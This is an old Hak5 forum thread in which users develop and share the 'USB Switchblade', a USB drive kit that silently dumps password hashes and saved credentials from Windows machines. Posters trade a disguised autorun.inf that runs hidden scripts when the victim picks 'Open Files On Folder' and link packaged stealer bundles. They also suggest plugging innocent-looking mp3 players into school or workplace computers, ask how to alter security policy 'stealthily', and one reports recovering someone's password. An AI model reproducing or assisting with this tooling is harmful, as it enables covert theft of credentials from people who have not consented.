Jump to content

USB Switchblade Development


Darren Kitchen

Recommended Posts

Sadly , I gave up my chance to get a U3 flashdrive for a wireless kb and mouse ... Argh ... why did i not see this first ! :oops:

Ill be on the lookout for such packages . Anyone has any idea roughly how large a flashdrive you need for this ?

Link to comment
Share on other sites

  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

Well for the non U3 version of this hack a 16mb drive would be enough, all the files dont use more than 1mb including the dumps. I didnt check out the U3 version(I don't have a u3 usb stick). But I'm 99% sure than 256 mb is more than enough for this type of hack.

Link to comment
Share on other sites

Praise the lord ! That means you could pull this non-u3 version of the hack off with your mp3 players :P I think using mp3 players would be fairly innocuous as not many people would suspect you of plugging USB mp3 player into their box =)

Imagine walking up to a box in your workplace( I wouldnt recommend it ) or your school and plugging in a mp3 player . It would seem innocuous .... but conceals a dastardly act .

^My imagination is running wild thinking of possible attack vectors :P

Link to comment
Share on other sites

I dont think you can get around the what do you want windows to do message but I am using Amish's method and I have all of the features of the U3.

What I did was downloaded them both and then created a hybrid of the two. The main thing that you have to modify is autorun.inf to point to go.cmd on the usb key, move nircmd.exe to the WIPCMD directory, and copy the Icons directory from amish's version to yours.

Here is my autorun.inf after modification

[autorun] 

action=Open Files On Folder

icon=WIPiconsdrive.ico

shellexecute=WIPCMDnircmd.exe execmd CALL WIPCMDgo.cmd

Its simple and you get all of the U3 features :D

Link to comment
Share on other sites

:( Unfortunately Amish's still seems to bug me with the "What do you want windows to do" message, and it doesn't copy the LM hashes either.

If anyone works out fixes for these for those of us without a spare U3 drive it would be great :)

Well that's the point of Amish's technique. Without U3 the autorun isn't going to happen*. However with Amish's technique by selecting the "Open Files On Folder" option you've actually chosen "Run Amish's scripts invisibly and then open the folder".

And sure it doesn't run pwdump yet but all you have to do is merge Amish's social engineering autorun with MaxDamage's invisible pwdumper and you'll be all set.

*nothing is impossible but AFAIK this is the way autorun works and I don't know of a workaround.

Link to comment
Share on other sites

ahhhh stupid me :roll:

It all makes sense now - I must of just discarded the whole "social engineering" comment describing the download :wink:

Am playing with merging the two now...

btw. you seem to be getting a fair bit of attention in the blogoshpere with this stuff ;)

Link to comment
Share on other sites

i've been doing some research as to my local policy question.. im trying to find the values in the registry, and im bugging a couple of my '1337' friends for some help. I think it could be done in VB using API scripts.. but im not sure.. any feedback would be wicked

Link to comment
Share on other sites

jackpot :D

....well kinda

I found the registry value and stuff for local securit policies that would normally make using fastpush impossible.

The Location is:

"Hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionSECEditREgValuesMachine/System/CurrentControlSet/Control/LSa/Forceguest"

However im a bit of a n00b and not sure of how to go about editing it, anyone know what the msot effective, and "stealthy" method of doing this would be?

Link to comment
Share on other sites

Please remember this is not a rip off of Amish im triyng ot pass of as my

own, the menu its self i made for my own personal use, but decided to

share incase it might be usfull of others... and this was no desiged to collect

passwords from multiple machines, its was done more of a tool box that

can be used at the time on the pc you have current access to...

kitww2.jpg

/ this is the Menu system ive made and put on my USBPen, it was orignaly

made for when im in college and i need to do stuff, but would be blocked

by a proxy or what ever, hope its of use to someone and use the PCInfo

to get all stuff you would normaly get..

Download Link

Hak5 Patch *this replaces Morgannwg with Hak5 ^^, hope you all like it*

Side not this the part to gather infomation is based around Amish with a few

extra's added to it, this was not intended for people who wanted to do

things sneakily :)

Application List :~

OpenOffice

AbiWord

Notepad++

VLC player

mIRC *NoNamesScript*

Gaim

FireFox

7Zip

uTorrent

FTPWander

Speedy *download manager*

TSearch1.6

Ollydug

ResEditor

TCPView

TCPTools *forgot other name for it*

Putty

VNC Viewer

FastPush

Cain

WinCap Installer

DX-Ball *fun and addictive little game*

PCInfo, will run the Package to gather Passwords etc..

total Size 350MB Uncompressed / 160MB Compressed

Link to comment
Share on other sites

Ok so here is my little modification

For those of you that would like to help my rapidshare.

http://rapidshare.de/files/32353339/PCInfo.rar.html

But I know its annoying and some people cannot download from rapidshare so

http://www.fileden.com/files/2006/7/8/116430/PCInfo.rar

Any problems or feedback let me know. :-)

why does cports.exe try to connect to 192.168.1.1 ??

Link to comment
Share on other sites

I think i found away around the admin problem..

From my understanding psexec is a program that lets you run apps in the system account.. For example you can use it to see hidden parts of the registry, im not sure if it could modified to work with the pwdump or w/e to run it in that method. the link is here: http://www.sysinternals.com/utilities/PSexec.html if you guys wanted to give it a shot. let me know what you guys come up with i cant really try anything right now, since im not at my computer

Link to comment
Share on other sites

Ok so here is my little modification

For those of you that would like to help my rapidshare.

http://rapidshare.de/files/32353339/PCInfo.rar.html

But I know its annoying and some people cannot download from rapidshare so

http://www.fileden.com/files/2006/7/8/116430/PCInfo.rar

Any problems or feedback let me know. :-)

why does cports.exe try to connect to 192.168.1.1 ??

Hmmm see if this makes a difference. Trash the old one.

http://rapidshare.de/files/32434912/NonU3.rar.html

or

http://www.fileden.com/files/2006/7/8/116430/NonU3.rar

Let me know if theres still a problem. But if you have a router I believe that might have something to do with it.

Link to comment
Share on other sites

I am going to see if there is a way I could do it for a memory card, maybe an SD.

Also, I am going to see if i can find a buffer or maybe format exploit for autorun.inf or maybe the icon.

Maybe even a timed crash hack, so after 30 min. or so it will crash.

Link to comment
Share on other sites

Please remember this is not a rip off of Amish im triyng ot pass of as my

own, the menu its self i made for my own personal use, but decided to

share incase it might be usfull of others... and this was no desiged to collect

passwords from multiple machines, its was done more of a tool box that

can be used at the time on the pc you have current access to...

/ this is the Menu system ive made and put on my USBPen, it was orignaly

made for when im in college and i need to do stuff, but would be blocked

by a proxy or what ever, hope its of use to someone and use the PCInfo

to get all stuff you would normaly get..

Download Link

Hak5 Patch *this replaces Morgannwg with Hak5 ^^, hope you all like it*

Side not this the part to gather infomation is based around Amish with a few

extra's added to it, this was not intended for people who wanted to do

things sneakily :)

Application List :~

OpenOffice

AbiWord

Notepad++

VLC player

mIRC *NoNamesScript*

Gaim

FireFox

7Zip

uTorrent

FTPWander

Speedy *download manager*

TSearch1.6

Ollydug

ResEditor

TCPView

TCPTools *forgot other name for it*

Putty

VNC Viewer

FastPush

Cain

WinCap Installer

DX-Ball *fun and addictive little game*

PCInfo, will run the Package to gather Passwords etc..

total Size 350MB Uncompressed / 160MB Compressed

This is very interesting, however it is not really part of the 'switchblade' hack. However I highly encourage you to add it to the wiki at www.hak5.org/wiki/

In fact, seeing how there are multiple versions of this project floating around we might want to move downloads and instructions to the wiki under a 'switchblade' page. However development discussion should stay in this this thread.

I'll be trying out the future developments and hopefully we can do a follow segment sometime soon. There are many great ideas floating around here. Mad props to all the interested hackers, and welcome to those that have stumbled upon Hak5 through the blogosphere.

Link to comment
Share on other sites

Ok so here is my little modification

For those of you that would like to help my rapidshare.

http://rapidshare.de/files/32353339/PCInfo.rar.html

But I know its annoying and some people cannot download from rapidshare so

http://www.fileden.com/files/2006/7/8/116430/PCInfo.rar

Any problems or feedback let me know. :-)

why does cports.exe try to connect to 192.168.1.1 ??

Hmmm see if this makes a difference. Trash the old one.

http://rapidshare.de/files/32434912/NonU3.rar.html

or

http://www.fileden.com/files/2006/7/8/116430/NonU3.rar

Let me know if theres still a problem. But if you have a router I believe that might have something to do with it.

nope still does it , prolly calling home ? but its to a dns ??

Link to comment
Share on other sites

I have put together MaxDamage and Amish's solutions together. I'm calling it MAD for now =P. I doesn't require U3 and will steal both LM hashes and history messenger passwords etc. I also made it so that the file structure was a little neater. I also used another version of pwdump that seems to work better for me. If someone could scan and encrypt any exe's that show as "hacktools" that would be great.

http://kapowdude.googlepages.com/MAD1.zip

Installation:

Extract the files in MAD 1.zip to the root of your portable storage device.

When connected to a computer it will dump everything it recieves to switchblade/dump/INSERTCOMPUTERNAMEHERE/

Enjoy

if you have any problems just drop me an email at kapowdude {at} gmail {dot} com

Edit: im gonna start the wiki

edit2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!)

Link to comment
Share on other sites

You need to fix this I think. It seems to dump the passwords, unfortunately the device becomes unavailable afterware. The orange light on my switchblade goes on for a sec then turns off

/boots linux to see what the duece went wrong

EDIT: Works fine in windows now (randomly) However it didnt dump anything of mine. I did however find the password of "adwtiger" :wink:

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...